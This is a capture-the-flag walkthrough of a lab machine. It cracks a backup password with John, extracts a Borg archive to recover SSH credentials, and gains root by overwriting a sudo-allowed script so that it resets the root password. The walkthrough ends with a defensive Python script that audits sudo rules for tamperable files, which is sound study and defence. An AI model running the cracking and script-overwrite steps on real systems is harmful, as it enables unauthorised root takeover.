Cyborg
JOHN
- We can Brute-Force the HASH using John
- Password: squidward
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
squidward (music_archive)
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn. >> music_archive:squidward
BORG
- The archive.tar is a Borg Backup.
- Listing the Contents of the Backup...
attacker@machine:~$ borg list final_archive
music_archive Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
- Extracting Files from Borg Backup using the Cracked Password: squidward
attacker@machine:~$ borg extract final_archive::music_archive
drwxrwxr-x 2 alex alex 0 29 dic 2020 home/alex/Desktop
-rw-r--r-- 2 root root 71 29 dic 2020 home/alex/Desktop/secret.txt
drwxrwxr-x 2 alex alex 0 29 dic 2020 home/alex/Documents
-rw-r--r-- 2 root root 110 29 dic 2020 home/alex/Documents/note.txt
- The File in the Documents Directory: note.txt contains Alex's SSH Credentials.
- alex : S3cretP@s3
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
Privilege Escalation
- Using SSH Credentials to Login: alex:S3cretP@s3
alex@ubuntu:~$ id
uid=1000(alex) gid=1000(alex) groups=1000(alex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
- The User alex can run: /etc/mp3backups/backup.sh as ROOT
- We own the File but it Lacks Write Permissions.
- We can assign the Correct Permissions Using: chmod
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 2020 /etc/mp3backups/backup.sh
alex@ubuntu:~$ chmod +w /etc/mp3backups/backup.sh
- Modifying the Script to change ROOT Password
alex@ubuntu:~$ echo '#!/bin/bash' > /etc/mp3backups/backup.sh
alex@ubuntu:~$ echo 'echo -e "password\npassword" | passwd root' >> /etc/mp3backups/backup.sh
alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh
- We can change the User from alex ➜ root by using the Password: password
alex@ubuntu:~$ su -
Password:
root@ubuntu:~$ id
uid=0(root) gid=0(root) groups=0(root)
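
The root cause of the escalation above is a NOPASSWD sudo rule that points at a script owned by alex: the owner can restore write access with chmod whatever the mode bits say. The Python audit below is an added example, not part of the original write-up. It parses `sudo -l` output and flags any command whose file or parent directory is not root-owned or is writable by non-root; the function names are hypothetical and the sample input is constructed from the output shown above.

```python
import os
import re
import stat
import sys
from pathlib import Path

# Constructed sample: the rule lines from the `sudo -l` output on this page.
SAMPLE_SUDO_L = """\
User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""

def sudo_commands(sudo_l_output):
    """Return the absolute command paths named in `sudo -l` rule lines."""
    cmds = []
    for line in sudo_l_output.splitlines():
        rule = re.match(r"\s*\([^)]*\)\s*(.*)", line)  # "(runas) TAG: cmd, cmd"
        if not rule:
            continue
        for spec in rule.group(1).split(","):
            spec = re.sub(r"^\s*(?:[A-Z_]+:\s*)+", "", spec).strip()
            if spec.startswith("/"):
                cmds.append(spec.split()[0])
    return cmds

def tamper_risks(path, lstat=os.lstat):
    """Return (node, reason) for the file and each parent that non-root can alter.
    Ownership matters more than the write bit: an owner can always chmod.
    Symlinks are not followed; `lstat` is injectable so tests run offline.
    """
    findings = []
    for node in [Path(path), *Path(path).parents]:
        try:
            st = lstat(node)
        except OSError:
            continue  # missing node: the parent checks still apply
        sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        if st.st_uid != 0:
            findings.append((str(node), f"owned by uid {st.st_uid}, not root"))
        elif st.st_mode & stat.S_IWOTH and not sticky_dir:
            findings.append((str(node), "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((str(node), f"writable by gid {st.st_gid}"))
    return findings

if __name__ == "__main__":  # usage: sudo -l | python3 audit_sudo.py
    for cmd in sudo_commands(sys.stdin.read()):
        for node, reason in tamper_risks(cmd):
            print(f"{cmd}: {node} is {reason}")
```

An empty result for every sudo-allowed command means the file and its whole directory chain are root-owned and not writable by others, which is the state the rule on this host should have been in.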